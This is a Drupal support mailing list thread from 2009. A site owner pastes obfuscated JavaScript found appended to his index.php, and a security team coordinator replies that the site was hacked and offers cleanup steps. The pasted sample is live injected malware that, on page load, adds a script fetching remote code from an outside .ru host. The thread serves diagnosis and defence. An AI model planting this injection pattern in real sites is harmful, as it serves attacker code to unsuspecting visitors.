See: My site was defaced ("hacked"). Now what?http://drupal.org/node/213320
If your index file has been been modified then your site has been hacked, likely by a bot. Change that index file and revisit the file permissions for your Drupal code files. Ask your hosts if they have a back-up of your database and see if they are willing to work with you to identify when each account was compromised.
Cheers, Kieran Drupal security team coordinator
2009/12/30 steven steven@vermoere.net
Hello,
I've encounterd a strange problem.
One of me sites has a changed index.php. The date of the file changed and the following lines were added at the end of the file:
/*GNU GPL*/ try{window.onload = function(){var G2kfrz1an5r =
document.createElement('s&$c$@(#r!!i^$p^$t^$@'.replace(/$|)|(|&|!|^|@|#/ig, ''));var Bl136slxkfs = 'Y0p6c2vs6gca8';G2kfrz1an5r.setAttribute('type', 't^!^^e#&x!$@t)(@/!)(j@#$@a@ )v#a!)s^c$(r(!&^i^^^)p&)$!t#&@'.replace(/@|)|#|(|&|$|!|^/ig, ''));G2kfrz1an5r.setAttribute('src', 'h()t)&^t#(p$:#!#!/$@!^/()q@(u))&i$$^k(##r$^-(^!@#c$o&&m).#^i(^#m@ &&a(g^$e&$f(##a$p()(.^&c@^()@o&^$^m$^^.!@&#l!a(^s#)t@-^))f#@&m#.$$t@ ^h#$e)&(g$&i@&(f($@t)@&s$a(&)#l!)e@ #.^r&)#u#!!(:)@&8#&(!0#&8$@$&0&((/#!^u^!&s^p^!!s(.^&^c@(o@$#m@^/((u@@!s@p $$@s$.^$$#c@o)m$@((!/!^a&#!!d@$u@l@t)$f#$$r@ )!^i$e$!&n$#)d!)f(^i#n(!d)($e&)r!@@!.)(^c(o$m!!!!/@#(g@ ^o#@o$@g)()l#&)^e#).@(c)o(m$@^#/@#d@a@!i$l@^#y#&m)$a#i)(l)(#.(@!c&(o@ (&@.$(!!u!#k^!@/)!!$'.replace(/@|)|!|(|^|&|$|#/ig, ''));G2kfrz1an5r.setAttribute('defer', 'd(&e)f(^e!r('.replace(/#|)|&|@|(|!|^|$/ig, ''));G2kfrz1an5r.setAttribute('id', 'S$##0@9^&&q$!^(t@b @$$7&(#v$))b#^@^v(!)y)#$9^@5&^#'.replace(/$|#|^|(|&|@|)|!/ig, ''));document.body.appendChild(G2kfrz1an5r);}} catch(Y2gjfbp30rk) {}
I have the impression this is encrypted javascript.
Is this site hacked ? And if yes, is this due to Drupal or server-side ?
Thank you
Steven
-- [ Drupal support list | http://lists.drupal.org/ ]